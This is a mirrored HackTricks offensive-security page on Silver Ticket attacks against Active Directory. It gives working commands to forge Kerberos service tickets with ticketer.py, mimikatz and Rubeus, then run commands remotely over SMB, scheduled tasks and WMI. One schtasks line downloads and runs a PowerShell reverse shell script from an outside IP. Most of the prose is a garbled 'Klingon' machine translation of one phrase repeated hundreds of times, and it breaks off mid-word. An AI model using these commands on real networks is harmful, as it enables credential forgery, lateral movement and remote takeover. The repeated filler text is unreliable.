Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

34 KiB

Raw Permalink Blame History

Silver Ticket

htARTE (HackTricks AWS Red Team Expert) ! qaStaHvIS htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

If you are interested in hacking career and hack the unhackable - we are hiring! (fluent polish written and spoken required).

{% embed url="https://www.stmcyber.com/careers" %}

Silver ticket

The Silver Ticket attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on acquiring the NTLM hash of a service account, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, impersonating any user, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.

For ticket crafting, different tools are employed based on the operating system:

On Linux

Linux DaqtaghlaHbe'chugh:

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Windows-vaD

Silver Ticket

tlhIngan Hol

Introduction

Silver Ticket jatlhlaHbe'chugh, 'ej 'oH 'e' vItlhutlh. Silver Ticket 'oH 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vItlhutlh. 'oH 'e' vItlhutlh 'ej 'oH 'e' vIt

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Silver Ticket

CIFS qutlhlaHmeH 'e' vItlhutlh. 'e' vItlhutlh HOST, RPCSS 'ej WMI qutlhlaHmeH.

qutlhlaHmeH

qutlhlaHmeH lo'	qutlhlaHmeH Silver Tickets
WMI	HOST, RPCSS
PowerShell Remoting	HOST, HTTP, WSMAN (OS vItlhutlh), RPCSS
WinRM	HOST, HTTP (chay')
Scheduled Tasks	HOST
Windows File Share, psexec	CIFS
LDAP operations, DCSync	LDAP
Windows Remote Server Administration Tools	RPCSS, LDAP, CIFS
Golden Tickets	krbtgt

Rubeus vItlhutlhlaH 'e' vItlhutlhlaHmeH vaj qutlhlaHmeH vItlhutlhlaHmeH:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets Event IDs

4624: Account Logon
4634: Account Logoff
4672: Admin Logon

qutlhlaHmeH tickets qutlh

qaStaHvIS, qutlhlaHmeH vItlhutlhlaHmeH administrator account vItlhutlhlaHmeH.

CIFS

'e' vItlhutlhlaHmeH vItlhutlhlaHmeH, 'ej 'e' vItlhutlhlaHmeH 'e' vItlhutlhlaHmeH 'SMB' (vaj 'e' vItlhutlhlaHmeH) 'ej vItlhutlhlaHmeH remote filesystem vItlhutlhlaHmeH:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

psexec jImejDaq vItlhutlh 'ej shell ghItlhutlh host vItlhutlh.:

{% content-ref url="../ntlm/psexec-and-winexec.md" %} psexec-and-winexec.md {% endcontent-ref %}

HOST

vaj permission vItlhutlh remote computers 'ej arbitrary commands ghItlhutlh:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

Dujmeyvam vItlhutlh WMI vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh **vItlh

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

tlhIngan Hol:

wmiexec rIn chaw' ghItlh 'ej ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 'e' rIn ghItlh 'e' wmiexec rIn chaw' ghItlh 